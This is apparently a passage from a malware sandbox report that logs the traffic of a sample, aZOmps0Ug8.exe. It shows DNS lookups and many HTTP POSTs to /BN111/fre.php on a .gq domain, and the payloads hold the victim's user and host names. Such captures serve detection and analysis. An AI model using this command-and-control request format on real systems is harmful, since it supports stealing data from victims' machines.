                      Oct 14, 2021 08:30:15.314672947 CEST8.8.8.8192.168.2.60x9ccNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:15.314672947 CEST8.8.8.8192.168.2.60x9ccNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:16.658160925 CEST8.8.8.8192.168.2.60x2770No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:16.658160925 CEST8.8.8.8192.168.2.60x2770No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:18.291595936 CEST8.8.8.8192.168.2.60x6e34No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:18.291595936 CEST8.8.8.8192.168.2.60x6e34No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • 74f26d34ffff049368a6cff8812f86ee.gq

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.649779172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:19.047157049 CEST1054OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 196
                      Connection: close
                      Oct 14, 2021 08:28:19.063373089 CEST1054OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: 'ckav.ruengineer377142DESKTOP-716T771k08F9C4E9C79A3B52B3F7394309iSTd
                      Oct 14, 2021 08:28:19.209945917 CEST1055INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tc%2BH09Yr5HaypHMlBF4iUDG3nhys2pPE4zSX4LGjecWNJzGpM%2B99gDFRrUNEMRf3eoe2rHO1C%2BujLeyZYYPL6AvWl4cI4PR4ssIE72e%2BnJtPmjJiBKaVLXSCw8d0%2BL7Ql8nO18QK89ttl7gsAcZIK9ns5%2B1G5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf331c2f691f-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.649780172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:20.347126961 CEST1056OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 196
                      Connection: close
                      Oct 14, 2021 08:28:20.363467932 CEST1056OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: 'ckav.ruengineer377142DESKTOP-716T771+08F9C4E9C79A3B52B3F7394305maiy
                      Oct 14, 2021 08:28:20.460792065 CEST1057INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hQkFe3UJ1QmCzUsZUQlHGGa3jv5VhF59kyHL%2FAsWX3Cle1Hp0JGwG2RiPxylz6fXh7eYHqVnm1Viov8%2Fg8G0zh1TwiCsMn%2BxPOnxpZErkhdqFG1ph3AcJYoYgnYYS96tyPBQDWnFXqoyO4YpwFfZSNVBuZc%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf3b3ba57057-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      10192.168.2.649789172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:32.511259079 CEST1074OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:32.527611971 CEST1074OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:32.680007935 CEST1075INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PsyKz23oumG1N2Qa6W82cL6U9NuCNhNUuC%2FZVgvvwW%2BDV3gzbbFfzB3%2BNtArLcKJk6RAdkcWIb70IWH9c1BU5tnjxYGlq1KaEkpgcFVk3A%2FjDdAOS0gYz6ayeBdJqQBA9VqH4EPLTxPN245tSgs%2BJ6qZbgIytw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf873cad5c62-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      11192.168.2.649790104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:33.672461987 CEST1076OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:33.689187050 CEST1076OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:33.830368042 CEST1077INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H68GrAIUZ61ik30eQPT7ieOnffpsCaIqd%2B20QY25W3jNlrWDPyTlhkKHRfJS%2FiUtwct9SjTEfhD8iO%2B5yucBGT673jWQTRVTfa6kc7%2Fx89CXhw5%2Fm91Iu3OgHm5JHlTRSAOWIMlJ6872pwxceJSRHYfcODJ2aQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf8e7a2f2b65-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      12192.168.2.649791172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:34.890356064 CEST1078OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:34.906606913 CEST1078OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:35.044509888 CEST1079INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uZ0sVZ19FquxOnQnQ8eV27mBYy1WgM0CUPb1NNnWMJzxc3043xzagNkBokq638MVdi87wkRVwA%2FaDhBllVz6Wa7tU%2BXqwhXPidoHFsE7wvUTdAVBYElnVusQQa8dyaLYa2RuJ8MO2LY4BrfzJZWgJLGhDagHvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf9619e27025-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      13192.168.2.649792172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:35.993002892 CEST1080OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:36.008896112 CEST1080OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:36.144937992 CEST1081INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:36 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cfaTZhkdZ%2B4BJCg2NEEt3iB1wdphtOW7vYogkgF6ssnB0JtOYVEcfiVEntxnGT8GGYD49JE7n6oNLeWj%2BaC3dp6n%2FnvCW6Yfyv6vLBoDeaIyz7FL%2BFkuxcREOUryCFN7LVICmGTi487rSg3JKSZqNWUkm5jFTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf9cfa384a85-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      14192.168.2.649793104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:37.119939089 CEST1082OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:37.136126995 CEST1082OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:37.232311010 CEST1083INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Yx4q2GcB87W4VIt%2F6Bl3361rtQSoUi34qsv3Q1MEZfb%2BSUNJrztSsb%2BJ14kBZzFEMs0Tkh%2F8iKsclQJnJlu7SyIBt6Rz6eoZ8nTufwUUBVTn4sWWS4kQt51roLWM4G0PcAOACqu4oY8Th1%2B801eD8ZrqSMLkmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfa408094e97-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      15192.168.2.649794172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:38.386394024 CEST1084OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:38.402403116 CEST1084OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:38.540837049 CEST1085INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Pn8lTUVtVtKkV%2B9%2FhI5pH%2Bbv3JxxkgBA0SYiWdJIlkIQKZcw5zH1I8kAF6QAJOIRQjkM%2BOmDifl0B6xVMTePviWGDxi0zLdm1s%2FnLGulx3kj4q8F2zNoVyQpgtSXW0TCRUbCOKrT9TH7mteyHIsbeqJURSgUUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfabfe766933-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      16192.168.2.649795172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:39.512557030 CEST1086OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:39.528501034 CEST1086OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:39.669177055 CEST1088INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fbYEyM1Gh6WdAzvjkUrxUJ61%2BI86%2FMQWYOt736TgF8PYXX4xRDCoMqDGqnuxaI5J8NZQWEAAFQmX57qs%2BjEX9BOBANnKvqJQwuiSDuZUH%2FmkItpnH6MouMDIgY94Ubkv2Xr%2FP6LV0udfFhbt0DzGN4dYvRJYjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfb2ffc45bdd-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      17192.168.2.649798172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:41.105942011 CEST1107OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:41.121790886 CEST1107OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:41.219671965 CEST1108INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tnOYS6v1%2BDryLySE0XRA3DanDggqIU5lD1efwHzLdufMHOXHG4q7dfhWoqlzoX5wDgi%2BczRB82cB78sgINYZ70528recLHfPp2P6sSiGDKYiKmOnVIaMSw3%2FJ%2FTVZtL%2FZnQlEs8dl3y5rZsfxnVPclRPmHDLkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfbcfff06925-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      18192.168.2.649799172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:42.274934053 CEST1109OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:42.290678978 CEST1109OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:42.387685061 CEST1110INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0EH47MMNXBWoZhSTeJKDFH5ttH4eNOc7DIMbRM5RUcGlJfPGdlM2qgJ%2FydGTeU89PVVspTxJUD78%2FLsz4jje9NE8J9ra8L440XXrJYNDu3lHjX7Az2%2FQMSbcG0NHixWuQ8qg3I%2FvBmZH39V3W4%2BLjJC5wpkOjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfc43f923240-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      19192.168.2.649800104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:43.873245001 CEST1111OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:43.889446020 CEST1111OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:43.996604919 CEST1112INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=krWVnXC%2BdefgGbNlcpBvuV%2B%2FEt1AN8TvqNCkwdnHu1u%2B%2Br4NhUyvinuefOGVyWbc9ShnhxYhW4%2BuqcpJdGFs2cOx%2Bg6Ex6pVLOOMw3MGB8imhhNCOi5JQPVnEFzH54P2wj3uTDGZgD%2B%2BgOSe36UWuNVLFTWpSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfce38355bed-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.649781104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:21.339482069 CEST1058OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:21.355484962 CEST1058OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:21.535239935 CEST1059INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gywdBNFWVFKIiZY3FEiKOzs84VMPVYr0KsnkFxu9YBLF66h9wh5gFt%2BKvxTgQoptbBobPo4zo%2FqKzOkAcdBuhuoMMrcjb2wrOtLU4%2BScQPJGN05F5R8f5lBn8MTmqMmHsvXJe26qCeRgvef6Z2NcGbvmdK2vnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf4179ac16e6-FRA
